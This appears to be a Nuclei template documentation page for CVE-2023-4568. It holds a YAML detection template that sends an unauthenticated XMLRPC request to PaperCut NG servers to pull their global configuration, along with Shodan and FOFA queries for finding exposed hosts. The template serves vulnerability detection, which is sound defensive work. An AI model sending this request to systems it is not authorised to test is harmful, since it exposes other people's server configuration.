Skip to content
Nuclei Templates

PaperCut NG Unauthenticated XMLRPC Functionality

ID: CVE-2023-4568

Severity: medium

Author: DhiyaneshDK

Tags: cve2023,cve,unauth,papercut

Description

Section titled “Description”

PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.

YAML Source

Section titled “YAML Source”
id: CVE-2023-4568


info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.02217
    epss-percentile: 0.89475
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query:
      - html:"content=\"PaperCut\""
      - http.html:'content="papercut'
      - cpe:"cpe:2.3:a:papercut:papercut_ng"
      - http.html:"content=\"papercut\""
    fofa-query:
      - body='content="papercut'
      - body="content=\"papercut\""
    google-query: html:'content="papercut'
  tags: cve2023,cve,unauth,papercut


http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml


        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and


      - type: word
        part: header
        words:
          - text/xml


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100953f6b2638c03dcb591858d7beeb6affded821cd568a20a30345753232584a6a022100fd292c8e4f4c0d9e391e3c8c5207fd65e2cac6ff336d59f3ddde41120f9cf57d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4568.yaml"

View on Github